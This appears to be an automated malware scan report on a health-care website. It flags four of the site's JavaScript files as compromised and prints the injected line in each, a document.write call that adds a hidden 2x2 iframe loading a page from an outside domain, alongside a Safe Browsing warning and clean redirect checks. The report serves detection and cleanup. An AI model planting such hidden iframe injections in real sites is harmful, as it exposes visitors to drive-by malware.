Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sc21plus.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sc21plus.com/ | 200 OK Content-Length: 12379 Content-Type: text/html | clean |
http://sc21plus.com/assets/swfobject/swfobject.js | 200 OK Content-Length: 10384 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3357161></iframe>');
var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getE Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://interjeroidejos.com/aood.html?j=3357161 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3357161> | ||
http://sc21plus.com/assets/swfaddress/swfaddress.js | 200 OK Content-Length: 16080 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3357161></iframe>');
if(typeof asual=="undefined"){var asual={}}if(typeof asual.util=="undefined"){asual.util={}}asual.util.Browser=new function(){var b=navigator.userAgent.toLowerCase(),a=/webkit/.test(b),e=/opera/.test(b),c=/msie/.test(b)&&!/opera/.test(b),d=/mozilla/.test(b)&&!/(compatible|webkit)/.test(b),f=parseFl Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://interjeroidejos.com/aood.html?j=3357161 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3357161> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js | 200 OK Content-Length: 85925 Content-Type: text/javascript | clean |
http://sc21plus.com/assets/motoResize.js | 200 OK Content-Length: 3990 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3357161></iframe>');
function getViewportSize() { var size = [0, 0]; if (typeof window.innerWidth != "undefined") { size = [window.innerWidth, window.innerHeight]; } else if (typeof document.documentElement != "undefined" && typeof document.documentElement.clientWidth != "undefined" && doc if (Math.abs(delta)>100) delta = Math.round(delta/100); if (swf['mouseWheel']) swf.mouseWheel(delta); }); } ,initHandlers:function() { if (!useFlashScroll) $util.initBindScroll(); $util.initMouseWheel(); } }; function initializeUtils() { $util.initHandlers(); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://interjeroidejos.com/aood.html?j=3357161 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3357161> | ||
http://sc21plus.com/assets/htmlWidget/htmlWidget.js | 200 OK Content-Length: 9299 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3357161></iframe>');
var htmlWidget = { swf:null ,getObj:function(id){return ( (document.getElementById) ? document.getElementById(id) : ( (document.all) ? document.all[id] : ( (document.layers) ? document.layers[id] : null ) ));} ,config:{ divId:'htmlWidget_', divClass: function initWidget(moduleData) { htmlWidget.init(moduleData); } function moveWidget(obj) { htmlWidget.move(obj); } function disposeWidget(id) { htmlWidget.dispose(id); } function openPopup() { htmlWidget.openPopup(); } function closePopup() { htmlWidget.closePopup(); } function log(text) { console.log(text); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://interjeroidejos.com/aood.html?j=3357161 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3357161> | ||
http://sc21plus.com/home | 200 OK Content-Length: 12383 Content-Type: text/html | clean |
http://sc21plus.com/your-health | 200 OK Content-Length: 7366 Content-Type: text/html | clean |
http://sc21plus.com/patient-care | 200 OK Content-Length: 5943 Content-Type: text/html | clean |
http://sc21plus.com/patient-care-1 | 200 OK Content-Length: 6104 Content-Type: text/html | clean |
http://sc21plus.com/patient-care-2 | 200 OK Content-Length: 6104 Content-Type: text/html | clean |
http://sc21plus.com/patient-care-3 | 200 OK Content-Length: 6104 Content-Type: text/html | clean |
http://sc21plus.com/career-center | 200 OK Content-Length: 9428 Content-Type: text/html | clean |
http://sc21plus.com/page-15 | 200 OK Content-Length: 9779 Content-Type: text/html | clean |
http://sc21plus.com/events | 200 OK Content-Length: 4513 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sc21plus.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 22 Dec 2014 19:49:03 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: moto_cms=863ec9d85c0dbff0463b62b5dc9a111c; path=/
GET / HTTP/1.1
Host: sc21plus.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 22 Dec 2014 19:49:03 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: moto_cms=863ec9d85c0dbff0463b62b5dc9a111c; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: sc21plus.com
Referer: http://www.google.com/search?q=sc21plus.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sc21plus.com
Referer: http://www.google.com/search?q=sc21plus.com
Result:
The result is similar to the first query. There are no suspicious redirects found.